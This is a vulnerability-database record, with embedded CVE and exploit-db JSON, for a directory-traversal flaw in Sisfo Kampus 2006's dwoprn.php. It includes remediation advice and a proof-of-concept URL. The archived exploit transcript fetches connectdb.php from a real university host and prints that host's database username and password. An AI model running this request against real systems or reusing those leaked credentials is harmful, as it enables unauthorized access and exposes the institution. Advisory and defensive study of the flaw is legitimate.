ID OSVDB:38659
Type osvdb
Reporter OSVDB
Modified 2007-09-10T00:00:00
Description
Manual Testing Notes
http://[target]/[dir]/dwoprn.php?f=connectdb.php
The `f` parameter of dwoprn.php names a file that the script returns to the client as a download, and no authentication is required (CVSS Au:NONE). Requesting `connectdb.php` therefore returns the application's own PHP source, which holds the plaintext database hostname, username and password; because the value is not confined to a fixed download directory (CWE-22 per the CVE), any other file readable by the web-server account can be fetched the same way. A site that exposed this endpoint should treat the credentials in connectdb.php as compromised and rotate them, and restrict `f` to an allow-list of downloadable files (or a `basename()` joined to a fixed directory) until the script is fixed. The archived exploit transcript below was run against a real institutional host and reproduces that host's credentials; those values are not test data.
References:
Vendor URL: http://Sisfokampus.net/
Secunia Advisory ID:23109
ISS X-Force ID: 36534
Generic Exploit URL: http://www.milw0rm.com/exploits/4386 (the same advisory is archived as EDB-ID:4386 at https://www.exploit-db.com/exploits/4386/)
CVE-2007-4895
{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nhttp://[target]/[dir]/dwoprn.php?f=connectdb.php\n## References:\nVendor URL: http://Sisfokampus.net/\n[Secunia Advisory ID:23109](https://secuniaresearch.flexerasoftware.com/advisories/23109/)\nISS X-Force ID: 36534\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4386\n[CVE-2007-4895](https://vulners.com/cve/CVE-2007-4895)\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:38659", "modified": "2007-09-10T00:00:00", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4895"]}, {"type": "exploitdb", "idList": ["EDB-ID:4386"]}], "modified": "2017-04-28T13:20:34", "rev": 2}, "vulnersScore": 6.1}, "id": "OSVDB:38659", "title": "Sisfo Kampus dwoprn.php f Variable Traversal Arbitrary File Access", "edition": 1, "published": "2007-09-10T00:00:00", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "cvelist": ["CVE-2007-4895"], "lastseen": "2017-04-28T13:20:34"}
{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Directory traversal vulnerability in dwoprn.php in Sisfo Kampus 2006 (Semarang 3) allows remote attackers to read arbitrary files via the f parameter.", "edition": 3, "cvss3": {}, "published": "2007-09-14T18:17:00", "title": "CVE-2007-4895", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4895"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:sisfo_kampus:sisfo_kampus:2006"], "id": "CVE-2007-4895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4895", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sisfo_kampus:sisfo_kampus:2006:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:48:37", "description": "Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability. CVE-2007-4895. 
Webapps exploit for php platform", "published": "2007-09-10T00:00:00", "type": "exploitdb", "title": "Sisfo Kampus 2006 dwoprn.php f Remote File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4895"], "modified": "2007-09-10T00:00:00", "id": "EDB-ID:4386", "href": "https://www.exploit-db.com/exploits/4386/", "sourceData": "original File name : PUPET-SisfoKampus2006.txt\n\ndate releases : September 10, 2007\n\n \n\nInformation :\n\n=========================\n\nAdvisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability\n\nAuthor: k-one A.K.A PUPET\n\nWebsite vendor : http://sisfokampus.net/\n\nProblem : All Local File can downloaded\n\n\nPOC :\n\n=========================\n\n \n\nhttp://[h0sT]/[dir]/dwoprn.php?f=connectdb.php\n\n \n\n \n\n[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php\n\n--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php\n\n => `dwoprn.php?f=connectdb.php'\n\nResolving ***.*****-subang.ac.id... 203.130.***.**\n\nConnecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.\n\nHTTP request sent, awaiting response... 200 OK\n\nLength: 292 [application/dwoprn]\n\n \n\n100%[====================================================================================================================================================================>] 292 --.--K/s\n\n \n\n07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]\n\n \n\n[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php\n\n<?php\n\n // file: connectdb.php\n\n // author: E. 
Setio Dewo, Maret 2003\n\n \n\n $db_username = \"t26924_siak\";\n\n $db_hostname = \"localhost\";\n\n $db_password = \"siakang\";\n\n $db_name = \"t26924_siak\";\n\n \n\n $con = _connect($db_hostname, $db_username, $db_password);\n\n $db = _select_db($db_name, $con);\n\n \n\n?>\n\nVendor Response:\n\n==============\n\nNot contacted yet\n\n \n\nPatch :\n\n=============\n\nNo Patch Available\n\nThis bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)\n\n# milw0rm.com [2007-09-10]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/4386/"}]}